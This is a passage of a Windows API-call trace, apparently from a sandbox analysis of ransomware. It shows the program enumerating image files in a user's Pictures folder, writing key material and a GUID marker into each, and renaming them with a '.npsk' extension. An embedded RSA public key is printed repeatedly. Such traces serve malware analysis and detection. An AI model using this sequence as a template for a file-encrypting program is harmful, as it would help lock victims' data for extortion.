ftLastAccessTime.dwHighDateTime=0x1d5e083, ftLastWriteTime.dwLowDateTime=0xce6c4f80, ftLastWriteTime.dwHighDateTime=0x1d5e083, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0216.653] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed8e4a70, ftCreationTime.dwHighDateTime=0x1d5e4d5, ftLastAccessTime.dwLowDateTime=0xdabb36b0, ftLastAccessTime.dwHighDateTime=0x1d5da0d, ftLastWriteTime.dwLowDateTime=0xdabb36b0, ftLastWriteTime.dwHighDateTime=0x1d5da0d, nFileSizeHigh=0x0, nFileSizeLow=0xc975, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6RIA5.gif", cAlternateFileName="")) returned 1 [0216.653] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\6RIA5.gif") returned=".gif" [0216.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\6RIA5.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\6ria5.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.654] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=51573) returned 1 [0216.654] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.656] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc94f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.656] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.658] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xc975, lpOverlapped=0x0) returned 1 [0216.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.659] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.659] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.660] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.660] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.660] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.660] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.660] GetLastError () returned 0x0 [0216.660] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.660] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.660] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.660] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.660] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.661] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.661] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xc975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.662] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.662] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.662] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.662] CloseHandle (hObject=0x61c) returned 1 [0216.664] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\6RIA5.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\6ria5.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\6RIA5.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\6ria5.gif.npsk")) returned 1 [0216.666] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8121940, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2737f850, ftLastAccessTime.dwHighDateTime=0x1d5d99d, ftLastWriteTime.dwLowDateTime=0x2737f850, ftLastWriteTime.dwHighDateTime=0x1d5d99d, nFileSizeHigh=0x0, nFileSizeLow=0x5669, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Af.gif", cAlternateFileName="")) returned 1 [0216.666] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\9Af.gif") returned=".gif" [0216.666] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\9Af.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\9af.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.666] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=22121) returned 1 [0216.666] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.668] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5643, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.668] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.670] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x5669, lpOverlapped=0x0) returned 1 [0216.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.671] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.671] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.672] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.672] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.672] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.672] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.672] GetLastError () returned 0x0 [0216.672] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.672] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.672] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.672] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.672] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.672] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.673] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x5669, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.673] WriteFile (in: hFile=0x61c, lpBuffer=0x3227170*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3227170*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.673] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.673] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.673] CloseHandle (hObject=0x61c) returned 1 [0216.675] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\9Af.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\9af.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\9Af.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\9af.gif.npsk")) returned 1 [0216.677] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda380640, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0xb2181a40, ftLastAccessTime.dwHighDateTime=0x1d5e758, ftLastWriteTime.dwLowDateTime=0xb2181a40, ftLastWriteTime.dwHighDateTime=0x1d5e758, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6W_22", cAlternateFileName="")) returned 1 [0216.677] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ffc0e0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x25bdf570, ftLastAccessTime.dwHighDateTime=0x1d5e725, ftLastWriteTime.dwLowDateTime=0x25bdf570, ftLastWriteTime.dwHighDateTime=0x1d5e725, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l20mH", cAlternateFileName="")) returned 1 [0216.677] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc62dc0, ftCreationTime.dwHighDateTime=0x1d5de1c, ftLastAccessTime.dwLowDateTime=0xef7647b0, ftLastAccessTime.dwHighDateTime=0x1d5e28d, ftLastWriteTime.dwLowDateTime=0xef7647b0, ftLastWriteTime.dwHighDateTime=0x1d5e28d, nFileSizeHigh=0x0, nFileSizeLow=0x12f08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l23envn.gif", cAlternateFileName="")) returned 1 [0216.677] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l23envn.gif") returned=".gif" [0216.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l23envn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l23envn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.679] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=77576) returned 1 [0216.679] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.681] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12ee2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.681] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.682] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x12f08, lpOverlapped=0x0) returned 1 [0216.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.684] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.685] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.685] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.685] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.685] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.685] GetLastError () returned 0x0 [0216.685] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.685] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.685] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.685] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.685] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.686] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.686] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x12f08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.686] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.687] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.687] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.687] CloseHandle (hObject=0x61c) returned 1 [0216.689] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l23envn.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l23envn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\l23envn.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\l23envn.gif.npsk")) returned 1 [0216.690] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e59edd0, ftCreationTime.dwHighDateTime=0x1d5e2f9, ftLastAccessTime.dwLowDateTime=0x71b916e0, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x71b916e0, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x173f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oC1m.png", cAlternateFileName="")) returned 1 [0216.691] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\oC1m.png") returned=".png" [0216.691] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\S-r24cctxl\\oC1m.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\s-r24cctxl\\oc1m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.694] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=95223) returned 1 [0216.694] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.696] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x173d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.696] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.697] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x173f7, lpOverlapped=0x0) returned 1 [0216.698] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.698] lstrlenA (lpString="-----BEGIN PUBLIC 